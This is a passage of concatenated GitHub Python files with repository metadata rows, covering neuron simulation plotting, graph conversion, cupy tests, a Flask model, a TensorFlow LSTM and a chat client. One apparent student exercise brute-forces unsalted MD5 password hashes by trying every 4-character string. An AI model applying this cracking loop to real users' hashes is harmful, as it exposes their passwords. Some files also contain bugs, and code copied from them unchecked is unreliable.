#insert the mechanism
cell2.insert('hhrx_clay_2') #inserting Clay revised HH model
cell2.ek = -72
cell2.ena = 55
vec['v2'] = h.Vector()
vec['v2'].record(cell2(0.99)._ref_v)
#Stimulation current
stim1=h.IClamp(0,sec=cell2)
stim1.delay=100 #ms
stim1.dur=80 #ms
stim1.amp= 250 #nA
tstop=200
h.dt=0.01
initialize()
integrate()
np.savetxt('v2.csv', vec['v2'], delimiter= ',')
## code for plotting the results
v1 = np.genfromtxt('v1.csv',delimiter=',')
v2 = np.genfromtxt('v2.csv',delimiter=',')
time = np.genfromtxt('time.csv', delimiter= ',')
fig = plt.figure()
ax = fig.add_subplot(2,1,1)
plt.plot(time,v1)
plt.xlabel( 'Time (ms)')
plt.ylabel(' Voltage (mV)')
plt.text(140,20, 'HH', fontsize = 12)
plt.xlim(80,200)
ax.set_xticklabels([])
ax.set_xticks([])
ax.set_yticklabels([])
ax.set_yticks([])
plt.ylim(-75,60)
plt.plot((100,180), (50,50), color = 'k', linewidth = 2)
plt.plot((185,185), (-50,0), color = 'k', linewidth = 2)
plt.text(187,-50, '-50', fontsize = 12)
plt.text(187,0, '0 mV', fontsize = 12)
ax = fig.add_subplot(2,1,2)
plt.plot(time,v2)
plt.xlim(80,200)
plt.xlabel( 'Time (ms)')
plt.ylabel(' Voltage (mV)')
plt.text(140,20, 'Clay, et. al. (2008)', fontsize = 12)
ax.set_xticklabels([])
ax.set_xticks([])
ax.set_yticklabels([])
ax.set_yticks([])
plt.ylim(-75,60)
plt.plot((185,185), (-50,0), color = 'k', linewidth = 2)
plt.plot((125,175), (0,0), color = 'k', linewidth = 2)
plt.text(187,-50, '-50', fontsize = 12)
plt.text(187,0, '0 mV', fontsize = 12)
plt.text(145,-15, '50 ms', fontsize = 12)
try:
plt.savefig('clay_mohit.jpeg',dpi=600, format='jpeg', bbox_inches='tight')
except:
plt.savefig('clay_mohit.jpeg',dpi=600, format='jpeg') # incase bbox_inches failes
plt.show()
| ModelDBRepository/189922 | clay_mohit.py | clay_mohit.py | py | 3,447 | python | en | code | 0 | github-code | 36 |
34357549837 | import argparse
import modelsim_utils
import time
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--do_file_name' , default = 'run_cmd.do')
parser.add_argument('-r', '--run_to_pane_shift_sleep_sec', default = 4) # 7
parser.add_argument('-t','--true_or_false_flag_example', action='store_true') # true if add flag to cmd line, false if don't
args = parser.parse_args()
time.sleep(1)
modelsim_utils.auto_run(args.do_file_name, int(args.run_to_pane_shift_sleep_sec))
| Brandon-Valley/examples | python/script_arg_parse.py | script_arg_parse.py | py | 496 | python | zh | code | 0 | github-code | 36 |
39755602271 | # @Author : tony
# @Date : 2021/5/2
# @Title : epjb2009 paper practice
# @Dec : deal with the dataset
import networkx as nx
# deal with the INT dataset
def readINT(dataUrl):
G = nx.read_gml(dataUrl)
list = dict()
edge_list = []
for id, label in enumerate(G.nodes()):
list[int(label)] = int(id)
for (v0, v1) in G.edges:
print(list[int(v0)], list[int(v1)])
edge_list.append([list[int(v0)], list[int(v1)]])
return edge_list
# deal with the INT dataset
def readPB(dataUrl):
G = nx.read_gml(dataUrl)
list = dict()
edge_list = []
for id, label in enumerate(G.nodes()):
list[label] = int(id)
print(id, label)
for (v0, v1) in G.edges:
print(v0, v1)
print(list[v0], list[v1])
edge_list.append([list[v0], list[v1]])
return edge_list
# deal with the Grid dataset
def readGrid(dataUrl):
G = nx.read_gml(dataUrl, label='id')
list = dict()
edge_list = []
for id, label in enumerate(G.nodes()):
list[int(label)] = int(id)
print(id, label)
for (v0, v1) in G.edges:
print(v0, v1)
print(list[v0], list[v1])
edge_list.append([list[v0], list[v1]])
return edge_list
# save the txt
def save(edgeIdList, fileName):
f = open(fileName, 'w')
temp = ''
for item in edgeIdList:
temp += str(item[0]) + ' ' + str(item[1])
temp += '\n'
f.write(temp)
f.close()
if __name__ == '__main__':
# print('------------- SRART Internet-------------')
# edge_list = readINT('./data gml/INT.gml')
# save(edge_list, './data gml/Internet.txt')
# print('------------- Internet END -------------')
# print('------------- SRART Political blogs-------------')
# edge_list = readPB('./data gml/PB.gml')
# print(edge_list)
# save(edge_list, './data gml/Political blogs.txt')
# print('------------- Political blogs END -------------')
print('------------- SRART Power grid-------------')
edge_list = readGrid('./data gml/Grid.gml')
print(edge_list)
save(edge_list, 'data gml/Power grid.txt')
print('------------- Power grid END -------------') | DDMXIE/LinkPrediction | practice/dataTransform.py | dataTransform.py | py | 2,178 | python | en | code | 0 | github-code | 36 |
8446001098 | import unittest
import pytest
from cupy_backends.cuda import stream as stream_module
import cupy
from cupy import _core
from cupy import testing
# TODO(leofang): test PTDS in this file
class DummyObjectWithCudaArrayInterface(object):
def __init__(self, a, ver=3):
self.a = a
self.ver = ver
@property
def __cuda_array_interface__(self):
desc = {
'shape': self.a.shape,
'strides': self.a.strides,
'typestr': self.a.dtype.str,
'descr': self.a.dtype.descr,
'data': (self.a.data.ptr, False),
'version': self.ver,
}
if self.ver == 3:
stream = cupy.cuda.get_current_stream()
desc['stream'] = 1 if stream.ptr == 0 else stream.ptr
return desc
@testing.parameterize(*testing.product({
'stream': ('null', 'new'),
'ver': (2, 3),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestArrayUfunc(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
@testing.for_all_dtypes_combination(names=['x_type', 'y_type'])
@testing.numpy_cupy_allclose(rtol=1e-6, accept_error=TypeError,
contiguous_check=False)
def check_array_scalar_op(self, op, xp, x_type, y_type, trans=False):
a = xp.array([[1, 2, 3], [4, 5, 6]], x_type)
if trans:
a = a.T
if xp is cupy:
with self.stream:
a = DummyObjectWithCudaArrayInterface(a, self.ver)
return getattr(xp, op)(a, y_type(3))
else:
return getattr(xp, op)(a, y_type(3))
def test_add_scalar(self):
self.check_array_scalar_op('add')
def test_add_scalar_with_strides(self):
self.check_array_scalar_op('add', trans=True)
@testing.parameterize(*testing.product({
'stream': ('null', 'new'),
'ver': (2, 3),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestElementwiseKernel(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
@testing.for_all_dtypes_combination()
@testing.numpy_cupy_allclose(rtol=1e-6, accept_error=TypeError,
contiguous_check=False)
def check_array_scalar_op(self, op, xp, dtyes, trans=False):
a = xp.array([[1, 2, 3], [4, 5, 6]], dtyes)
if trans:
a = a.T
if xp is cupy:
with self.stream:
a = DummyObjectWithCudaArrayInterface(a, self.ver)
f = cupy.ElementwiseKernel('T x, T y', 'T z', 'z = x + y')
return f(a, dtyes(3))
else:
return a + dtyes(3)
def test_add_scalar(self):
self.check_array_scalar_op('add')
def test_add_scalar_with_strides(self):
self.check_array_scalar_op('add', trans=True)
@testing.parameterize(*testing.product({
'stream': ('null', 'new'),
'ver': (2, 3),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestSimpleReductionFunction(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
self.my_int8_sum = _core.create_reduction_func(
'my_sum', ('b->b',), ('in0', 'a + b', 'out0 = a', None))
@testing.numpy_cupy_allclose()
def check_int8_sum(self, shape, xp, axis=None, keepdims=False,
trans=False):
a = testing.shaped_random(shape, xp, 'b')
if trans:
a = a.T
if xp == cupy:
with self.stream:
a = DummyObjectWithCudaArrayInterface(a, self.ver)
return self.my_int8_sum(
a, axis=axis, keepdims=keepdims)
else:
return a.sum(axis=axis, keepdims=keepdims, dtype='b')
def test_shape(self):
self.check_int8_sum((2 ** 10,))
def test_shape_with_strides(self):
self.check_int8_sum((2 ** 10, 16), trans=True)
@testing.parameterize(*testing.product({
'stream': ('null', 'new'),
'ver': (2, 3),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestReductionKernel(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
self.my_sum = _core.ReductionKernel(
'T x', 'T out', 'x', 'a + b', 'out = a', '0', 'my_sum')
@testing.numpy_cupy_allclose()
def check_int8_sum(self, shape, xp, axis=None, keepdims=False,
trans=False):
a = testing.shaped_random(shape, xp, 'b')
if trans:
a = a.T
if xp == cupy:
with self.stream:
a = DummyObjectWithCudaArrayInterface(a, self.ver)
return self.my_sum(
a, axis=axis, keepdims=keepdims)
else:
return a.sum(axis=axis, keepdims=keepdims, dtype='b')
def test_shape(self):
self.check_int8_sum((2 ** 10,))
def test_shape_with_strides(self):
self.check_int8_sum((2 ** 10, 16), trans=True)
@testing.parameterize(
{'shape': (10,), 'slices': (slice(0, None),)},
{'shape': (10,), 'slices': (slice(2, None),)},
{'shape': (10, 10), 'slices': (slice(0, None), slice(0, None))},
{'shape': (10, 10), 'slices': (slice(0, None), slice(2, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(0, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(2, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(4, None))},
)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestSlicingMemoryPointer(unittest.TestCase):
@testing.for_all_dtypes_combination(names=['dtype'])
@testing.for_orders('CF')
def test_shape_with_strides(self, dtype, order):
x = cupy.zeros(self.shape, dtype=dtype, order=order)
start = [s.start for s in self.slices]
itemsize = cupy.dtype(dtype).itemsize
dimsize = [s * itemsize for s in start]
if len(self.shape) == 1:
offset = start[0] * itemsize
else:
if order == 'C':
offset = self.shape[0] * dimsize[0] + dimsize[1]
else:
offset = self.shape[0] * dimsize[1] + dimsize[0]
cai_ptr, _ = x.__cuda_array_interface__['data']
slice_cai_ptr, _ = x[self.slices].__cuda_array_interface__['data']
cupy_data_ptr = x.data.ptr
sliced_cupy_data_ptr = x[self.slices].data.ptr
assert cai_ptr == cupy_data_ptr
assert slice_cai_ptr == sliced_cupy_data_ptr
assert slice_cai_ptr == cai_ptr+offset
test_cases = [
{'shape': (10,), 'slices': (slice(0, None),)},
{'shape': (10,), 'slices': (slice(2, None),)},
{'shape': (10, 10), 'slices': (slice(0, None), slice(0, None))},
{'shape': (10, 10), 'slices': (slice(0, None), slice(2, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(0, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(2, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(4, None))},
]
test_streams = ('null', 'new')
test_cases_with_stream = [
{'stream': s, **t} for t in test_cases for s in test_streams]
@testing.parameterize(*test_cases_with_stream)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestCUDAArrayInterfaceCompliance(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
@testing.for_all_dtypes_combination(names=['dtype'])
@testing.for_orders('CF')
def test_value_type(self, dtype, order):
x = cupy.zeros(self.shape, dtype=dtype, order=order)
y = x[self.slices]
# mandatory entries
with self.stream:
CAI = y.__cuda_array_interface__
shape = CAI['shape']
typestr = CAI['typestr']
ptr, readonly = CAI['data']
version = CAI['version']
strides = CAI['strides']
# optional entries
descr = CAI['descr'] if 'descr' in CAI else None
stream = CAI['stream'] if 'stream' in CAI else None
# Don't validate correctness of data here, just their types
assert version == 3 # bump this when the protocol is updated!
assert isinstance(CAI, dict)
assert isinstance(shape, tuple)
assert isinstance(typestr, str)
assert isinstance(ptr, int)
assert isinstance(readonly, bool)
assert (strides is None) or isinstance(strides, tuple)
assert (descr is None) or isinstance(descr, list)
if isinstance(descr, list):
for item in descr:
assert isinstance(item, tuple)
assert (stream is None) or isinstance(stream, int)
@testing.parameterize(*testing.product({
'stream': ('null', 'new', 'ptds'),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestCUDAArrayInterfaceStream(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
elif self.stream == 'ptds':
self.stream = cupy.cuda.Stream.ptds
def test_stream_export(self):
a = cupy.empty(100)
# the stream context should export the stream
with self.stream:
stream_ptr = a.__cuda_array_interface__['stream']
if self.stream is cupy.cuda.Stream.null:
assert stream_ptr == stream_module.get_default_stream_ptr()
elif self.stream is cupy.cuda.Stream.ptds:
assert stream_ptr == 2
else:
assert stream_ptr == self.stream.ptr
# without a stream context, it's always the default stream
stream_ptr = a.__cuda_array_interface__['stream']
assert stream_ptr == stream_module.get_default_stream_ptr()
| cupy/cupy | tests/cupy_tests/core_tests/test_ndarray_cuda_array_interface.py | test_ndarray_cuda_array_interface.py | py | 10,691 | python | en | code | 7,341 | github-code | 36 |
2285653529 | #Item 1 #############################################################################################################
import hashlib
from random import randint
def cadastrar(nome,senha):
senhaReal = senha
senhaHash = (hashlib.md5(senhaReal.encode('utf-8')).hexdigest())
with open("UsuariosCadastrados.txt", "a") as stream: # usa "w" para não armazenar mais de 1 palavra
print(nome, senhaHash, file=stream)
def md5(senha):
senhaNova = (hashlib.md5(senha.encode('utf-8')).hexdigest())
return senhaNova
def autenticar(nome,senha):
if nome in listaUsu:
z = listaUsu.index(nome)
if senha == listaUsu[z+1]:
print("Autentificacao efetuada com sucesso. Bem vindo ", nome)
else:
print("Nome ou senha invalidos.")
else:
print("Nome ou senha invalidos.")
listaUsu = []
listaHash = []
a = 1
while a == 1:
nomeCadast = input("Digite um nome (de 4 caracteres) para cadastro: ")
senhaCadast = input("Digite uma senha (de 4 caracteres) para cadastro: ")
ativa = 1
if ativa ==1:
if (len(nomeCadast) or len(senhaCadast)) >4:
print("Nome ou Senha digitado esta fora dos limites.")
else:
listaUsu.append(nomeCadast)
listaUsu.append(senhaCadast)
senhaHash = md5(senhaCadast)
listaHash.append(senhaHash)
cadastrar(nomeCadast, senhaCadast)
a = int(input("Digite (0) se quiser parar de fazer cadastros, ou (1) para continuar: "))
fazer = int(input("Digite (1) se deseja autentificar, ou (0) para sair: "))
if fazer == 1:
nomeAutent = input("Digite seu nome para Login: ")
senhaAutent = input("Digite sua senha para Login: ")
autenticar(nomeAutent,senhaAutent)
print("\n")
##Item 2: quebra md5 ################################################################################################
#import hashlib
import string
import datetime
from datetime import timedelta
def quebraMd5(senha1,senha2,senha3,senha4):
hashes = [senha1, senha2, senha3, senha4]
startTime = datetime.datetime.now()
tempo_comeco = datetime.datetime.now()
x = 0
# diminui = timedelta(seconds=1) --> SE QUISER DIMINUIR UM TEMPO DETERMINADO
for a in string.printable:
for b in string.printable:
for c in string.printable:
for d in string.printable:
word = a + b + c + d
hash = hashlib.md5(word.encode("utf-8")).hexdigest()
# print(str(hash))
if hash in hashes:
end_time = str(datetime.datetime.now() - startTime).split('.')[0]
print("Senha Hash quebrada com sucesso!!")
print("Senha original: ", word)
print("Codigo HASH: ", hash)
print("Tempo necessário: ", end_time)
print("\n")
startTime = datetime.datetime.now()
x = x + 1
if x >= len(hashes):
tempo_final = str(datetime.datetime.now() - tempo_comeco).split('.')[0]
print("Tempo total: ", tempo_final)
break
senha1 = listaHash[0]
senha2 = listaHash[1]
senha3 = listaHash[2]
senha4 = listaHash[3]
quebraMd5(senha1,senha2,senha3,senha4)
#Item 3 ##############################################################################################################
def crip(texto,chave): #pode usar numeros tbm
aq = []
for cont in range (len(texto)):
if texto[cont] == (chr(32)) or (chr(97)<=texto[cont]<=chr(122)):
if texto[cont] == " ":
aq.append(" ")
else:
crip = ord(texto[cont])
if chr(crip+chave) <= chr(122):
crip = chr(crip + chave)
aq.append(crip)
elif chr(crip+chave) > chr(122):
numero = (crip + chave)
numero = numero - 122
crip = chr(96 + numero)
aq.append(crip)
if chr(48)<=texto[cont]<=chr(57):
crip = ord(texto[cont])
if chr(crip+chave) <= chr(57):
crip = chr(crip+chave)
aq.append(crip)
elif chr(crip+chave) > chr(57):
numero = (crip+chave)
numero = numero - 57
crip = chr(47 + numero)
aq.append(crip)
aq = "".join(aq)
return(aq)
chaveRandom1 = randint(1,9)
senhaProte1 = crip(senha1,chaveRandom1)
chaveRandom2 = randint(1,9)
senhaProte2 = crip(senha2,chaveRandom2)
chaveRandom3 = randint(1,9)
senhaProte3 = crip(senha3,chaveRandom3)
chaveRandom4 = randint(1,9)
senhaProte4 = crip(senha4,chaveRandom4)
with open("HASHSModificados.txt", "a") as stream: # usa "w" para não armazenar mais de 1 palavra
print(senhaProte1, senhaProte2, senhaProte3, senhaProte4, file=stream)
print("\n")
print(f"Novo Hash Protegido de {listaUsu[0]} - {senhaProte1}")
print(f"Novo Hash Protegido de {listaUsu[2]} - {senhaProte2}")
print(f"Novo Hash Protegido de {listaUsu[4]} - {senhaProte3}")
print(f"Novo Hash Protegido de {listaUsu[6]} - {senhaProte4}") | Williamsbsa/Quebra-de-Hash-MD5-Python | QuebradeHashMd5.py | QuebradeHashMd5.py | py | 5,406 | python | pt | code | 0 | github-code | 36 |
32336318719 | from flask_app.config.mysqlconnection import connectToMySQL
class User:
def __init__(self, data):
self.id = data['id']
self.first_name = data['first_name']
self.last_name = data['last_name']
self.email = data['email']
self.created_at = data['created_at']
self.updated_at = data['updated_at']
@classmethod
def get_all_users(cls):
query = "SELECT * FROM users;"
users_from_db = connectToMySQL("users_schema").query_db(query)
users_list = []
for user in users_from_db:
users_list.append(cls(user))
return users
@classmethod
def get_one_user(cls, data):
query = "SELECT * FROM users;"
results = connectToMySQL("users_schema").query_db(query, data)
users_obj = cls()
return users_obj
@classmethod
def create(cls, data):
query = "INSERT INTO users (first_name, last_name, email, created_at, updated_at) VALUES (%(fname)s, %(lname)s, %(email)s, NOW(), NOW());"
users_id = connectToMySQL("users_schema").query_db(query, data)
return users_id
@classmethod
def delete_user(cls, data):
query = "DELETE FROM dogs WHERE id = %(id)s"
connectToMySQL("users_schema").query_db(query, data)
@classmethod
def update_user(cls, data):
query = "UPDATE users SET first_name = %(fname)s, last_name = %(lname)s, email = %(email)s, updated_at = NOW() WHERE id = %(id)s"
results = connectToMySQL("users_schema").query_db(query, data)
return results | JBShort/post-Bootcamp-Python | flask_mysql/Users_CRUD_Modularized/flask_app/models/user.py | user.py | py | 1,593 | python | en | code | 0 | github-code | 36 |
18605057627 | import tensorflow as tf
from QingDaoCoRec.CoRec import input_data
import os
import csv
import time
import numpy as np
dir = 'MODEL'
mod_name = 'model'
mod_cnt = 0
mod_end = '.ckpt'
batch_size = 100
def wei_mat(shape):
ini = tf.random.truncated_normal(shape, stddev=0.1)
return tf.Variable(ini)
def bias_mat(shape):
ini = tf.constant(0.1, dtype=tf.float32, shape=shape)
return tf.Variable(ini)
def conv_1d(x_, W):
return tf.nn.conv1d(x_, W, 1, padding='SAME')
def max_pool(x_):
return tf.nn.max_pool2d(x_, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def mean_pool(x_):
return tf.nn.avg_pool2d(x_, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def multi(x_, W):
return tf.matmul(x_, W)
def save_model(sess, directory_name, model_name):
# save arguments
saver = tf.compat.v1.train.Saver()
directory_path = os.getcwd()
directory_path = os.path.join(directory_path, directory_name)
if not os.path.exists(directory_name):
os.mkdir(directory_path)
saver.save(sess, os.path.join(directory_path, model_name))
def model():
x = tf.compat.v1.placeholder(tf.float32, [None, 27551])
label = tf.compat.v1.placeholder(tf.float32, [None, 2])
fx = tf.reshape(x, [-1, 27551, 1])
drop_rate = tf.compat.v1.placeholder(tf.float32)
# x = tf.split(x, batch_size)
# birnn
# lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(36499, forget_bias=1.0)
# lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(36499, forget_bias=1.0)
# outputs, _, _ = tf.contrib.rnn.static_bidirectional_rnn(lstm_fw_cell, lstm_bw_cell, x, dtype=tf.float32)
# rnn
rnncell = tf.keras.layers.LSTMCell(32)
rnnlayer = tf.keras.layers.RNN(rnncell)
rnnop = rnnlayer(fx)
rnnop_dropout = tf.nn.dropout(rnnop, rate=drop_rate)
# full connect
W_fc = wei_mat([32, 2048])
B_fc = bias_mat([2048])
Out_fc = tf.nn.relu(multi(rnnop_dropout, W_fc) + B_fc)
# Full Connected Dropout
Out_fc_dropout = tf.nn.dropout(Out_fc, rate=drop_rate)
# Softmax->2 labels
W_soft = wei_mat([2048, 2])
B_soft = bias_mat([2])
y = tf.nn.softmax(multi(Out_fc_dropout, W_soft) + B_soft)
return x, label, y, drop_rate
def train_model(epoch=30):
global mod_cnt, batch_size
data = input_data.read_data_sets('train.csv')
batch_num = int(data.size() / batch_size) + 1
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.compat.v1.InteractiveSession(config=config)
# get model
x, label, y, drop_rate = model()
# cross entropy
cross_entropy = -tf.reduce_sum(label * tf.math.log(y))
train_step = tf.compat.v1.train.AdamOptimizer(1e-5).minimize(cross_entropy)
# accuracy
predict = tf.equal(tf.argmax(label, 1), tf.argmax(y, 1))
accuracy = tf.reduce_mean(tf.cast(predict, dtype=tf.float32))
saver = tf.compat.v1.train.Saver()
ckpt = tf.train.get_checkpoint_state('MODEL/')
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
print('Model: ' + str(ckpt.model_checkpoint_path) + ' has been restored at ' + str(time.strftime('%H:%M:%S')))
else:
tf.compat.v1.global_variables_initializer().run()
print('No model to restore.')
# training
start = time.perf_counter()
if os.path.exists(r'MODEL/ite.npy'):
last = np.load(r'MODEL/ite.npy', allow_pickle=True)
else:
last = (0, 0)
i, j = last[0], last[1]
print('Last Training terminated at epoch %d , batch %d' % (i, j))
print('Training now continue')
while i < epoch + 1:
while j < batch_num:
batch = data.next_batch(batch_size)
train_step.run(feed_dict={x: batch[0], label: batch[1], drop_rate: 0.5}, session=sess)
# training_accuracy = accuracy.eval(feed_dict={x: batch[0], label: batch[1], drop_rate: 0}, session=sess)
# print('epoch:%d/%d batch:%d/%d ---training accracy=%g' % (i, epoch, j, batch_num, training_accuracy))
loss = cross_entropy.eval(feed_dict={x: batch[0], label: batch[1], drop_rate: 0}, session=sess)
print('epoch:%d/%d batch:%d/%d ---loss=%g' % (i, epoch, j, batch_num, loss))
if time.perf_counter() - start > 1800:
save_model(sess, dir, mod_name + mod_end)
start = time.perf_counter()
print('Model saved at ' + str(time.strftime('%H:%M:%S')))
np.save(r'MODEL/ite.npy', (i, j))
j += 1
j = 0
i += 1
save_model(sess, dir, mod_name + mod_end)
sess.close()
def model_call(data):
print(data.shape)
sess = tf.compat.v1.InteractiveSession()
# get model
x, label, y, drop_rate = model()
# recover checkpoint
saver = tf.compat.v1.train.Saver()
directory_path = os.getcwd()
directory_path = os.path.join(directory_path, dir, mod_name + mod_end)
saver.restore(sess, directory_path)
# calling model
prediction = y
total_res = None
for i in range(0, 9550, 50):
print(i)
predint = prediction.eval(feed_dict={x: data[i:i + 50], drop_rate: 0}, session=sess)
res = predint.T
if i == 0:
total_res = res
else:
total_res = np.concatenate((total_res, res), axis=-1)
predint = prediction.eval(feed_dict={x: data[9550:], drop_rate: 0}, session=sess)
res = predint.T
total_res = np.concatenate((total_res, res), axis=-1)
np.save('res.npy', total_res)
with open('r.csv', 'w', newline='') as file:
w = csv.writer(file)
for i in total_res[1]:
w.writerow([i])
if __name__ == "__main__":
with tf.device("/cpu:0"):
train_model()
# a = pd.read_csv('test.csv')
# c = [r for r in a]
# data = a[c[1:-2]].values
# model_call(data)
| B1ACK917/QingDaoCoRec | CoRec/mod.py | mod.py | py | 6,068 | python | en | code | 1 | github-code | 36 |
11193542891 | """ клиентская часть """
import sys
import json
import time
import re
import logging
import logs.config_client_log
from lib.variables import ACTION, PRESENCE, TIME, USER, ACCOUNT_NAME, RESPONSE, AUTH, ALERT, MSG, ERR200, ERR400, \
CLIENT_LISTEN, LISTEN, SENDER, MSG, MSG_TEXT, ERROR
from lib.utils import create_socket, server_settings, get_message, send_message
from lib.errors import ReqFieldMissingError, ServerError
from logs.decoration_log import log
CLIENT_LOGGER = logging.getLogger('client')
@log
def message_from_server(message):
"""Функция - обработчик сообщений других пользователей, поступающих с сервера"""
if ACTION in message and message[ACTION] == MSG and \
SENDER in message and MSG_TEXT in message:
print(f'Получено сообщение от пользователя {message[SENDER]}:\n{message[MSG_TEXT]}')
CLIENT_LOGGER.info(f'Получено сообщение от пользователя {message[SENDER]}:\n{message[MSG_TEXT]}')
else:
CLIENT_LOGGER.error(f'Получено некорректное сообщение с сервера: {message}')
@log
def create_message(sock, account_name='Guest'):
"""Функция запрашивает текст сообщения и возвращает его.
Так же завершает работу при вводе подобной комманды
"""
message = input('Введите сообщение для отправки или \'exit\' для завершения работы: ')
if message.lower() == 'exit':
sock.close()
CLIENT_LOGGER.info('Завершение работы по команде пользователя.')
sys.exit(0)
message_dict = {ACTION: MSG,TIME: time.time(),ACCOUNT_NAME: account_name,MSG_TEXT: message}
CLIENT_LOGGER.debug(f'Сформирован словарь сообщения: {message_dict}')
return message_dict
@log
def create_presence(account_name='Guest'):
'''
Функция генерирует запрос о присутствии клиента
:param account_name:
:return:
'''
# {'action': 'presence', 'time': 1573760672.167031, 'user': {'account_name': 'Guest'}}
out = {ACTION: PRESENCE, TIME: time.time(), USER: {ACCOUNT_NAME: account_name}}
CLIENT_LOGGER.debug(f'Сформировано {PRESENCE} сообщение для пользователя {account_name}')
return out
@log
def get_user():
"""
функция возвращает имя пользователя
:return:
"""
while True:
account = input("введите имя пользователя >>>")
if not re.match(r"[A-Za-z]", account) or len(account) > 25 or len(account) < 3:
CLIENT_LOGGER.error(f"недопустимое имя пользователя: {account}")
print("Имя пользователя должно быть от 3 до 25 латинских символов")
elif account.lower().strip() == 'guest':
CLIENT_LOGGER.error(f"недопустимое имя пользователя: {account}")
print("Недоспустимое имя пользователя")
else:
break
return account
@log
def create_action(account_name, action, msg=None):
'''
Функция отдает словарь с текстом сообщения
:param account_name:
:return:
'''
# {'action': 'presence', 'time': 1573760672.167031, 'user': {'account_name': 'Guest'}}
out = {ACTION: action, TIME: time.time(), USER: {ACCOUNT_NAME: account_name}, MSG: msg}
CLIENT_LOGGER.debug(f'Сформировано {ACTION} сообщение для пользователя {account_name}')
return out
@log
def process_handler(message):
'''
Функция разбирает ответ сервера
:param message:
:return:
'''
CLIENT_LOGGER.debug(f'Разбор приветственного сообщения от сервера: {message}')
print(f'Разбор приветственного сообщения от сервера: {message}')
if RESPONSE in message:
if message[RESPONSE]==200: #message[RESPONSE]==200:
CLIENT_LOGGER.debug(f"{message[RESPONSE]} содержит {ERR200}")
return message[MSG] #ERR200
elif message[RESPONSE]==ERR400: #message[RESPONSE]==400:
CLIENT_LOGGER.debug(f"{message[RESPONSE]} содержит {ERR400}")
raise ServerError(f"{ERR400}: {message[ERROR]}")
raise ReqFieldMissingError(RESPONSE)
@log
def start_client():
srv_settings = server_settings()
server_address = srv_settings[0]
server_port = srv_settings[1]
client_listen = srv_settings[2]
print(f"start client on: {server_address}:{server_port} | listen_mode={client_listen}")
CLIENT_LOGGER.info(f"client started {server_address}:{server_port} | listen_mode={client_listen}")
try:
transport = create_socket()
transport.connect((server_address, server_port))
send_message(transport, create_presence())
answer = process_handler(get_message(transport))
CLIENT_LOGGER.info(f"соединение с сервером {server_address}:{server_port}. Ответ: {answer}")
print(f"соединение с сервером {server_address}:{server_port}. Ответ: {answer}")
# авторизация
account_name = get_user()
CLIENT_LOGGER.info(f"Guest авторизовался как {account_name}")
CLIENT_LOGGER.debug(f"отправка {AUTH} сообщения на сервер {server_address}:{server_port} от user={account_name}")
message_to_server = create_action(account_name, action=AUTH, msg=None)
send_message(transport, message_to_server)
try:
answer = process_handler(get_message(transport))
print(answer)
except (ValueError, json.JSONDecodeError):
print(answer)
CLIENT_LOGGER.error(f"{ERR400}. Не удалось декодировать сообшение от сервера")
print(f"{ERR400}. Не удалось декодировать сообшение от сервера")
except json.JSONDecodeError:
CLIENT_LOGGER.error(f"не удалось декодировать JSON-строку")
print(f"не удалось декодировать JSON-строку")
sys.exit(1)
except ServerError as error:
CLIENT_LOGGER.error(f"ошибка при установке соединения: {error.text}")
print(f"ошибка при установке соединения: {error.text}")
sys.exit(1)
except ReqFieldMissingError as missing_error:
CLIENT_LOGGER.error(f"в ответе сервера нет обязательного поля {missing_error.missing_field}")
sys.exit(1)
except ConnectionRefusedError:
CLIENT_LOGGER.critical(f"Не удалось подключиться к серверу {server_address}:{server_port}")
sys.exit(1)
else:
print(f"клиент - в режиме client_listen={client_listen:}")
while True:
if not client_listen:
try:
send_message(transport, create_message(transport))
except (ConnectionResetError, ConnectionError, ConnectionAbortedError):
CLIENT_LOGGER.error(f"соединение с сервером {server_address}:{server_port} потеряно")
print(f"соединение с сервером {server_address}:{server_port} потеряно")
sys.exit(1)
if client_listen:
try:
message_from_server(get_message(transport))
except (ConnectionResetError, ConnectionError, ConnectionAbortedError):
CLIENT_LOGGER.error(f"соединение с сервером {server_address}:{server_port} потеряно")
print(f"соединение с сервером {server_address}:{server_port} потеряно")
sys.exit(1)
if __name__ == '__main__':
start_client()
| ESarmanov/client_server_app_Python_GeekBrains | Lesson_7_Sarmanov_EF/client.py | client.py | py | 8,345 | python | ru | code | 0 | github-code | 36 |
25577847045 | class Solution:
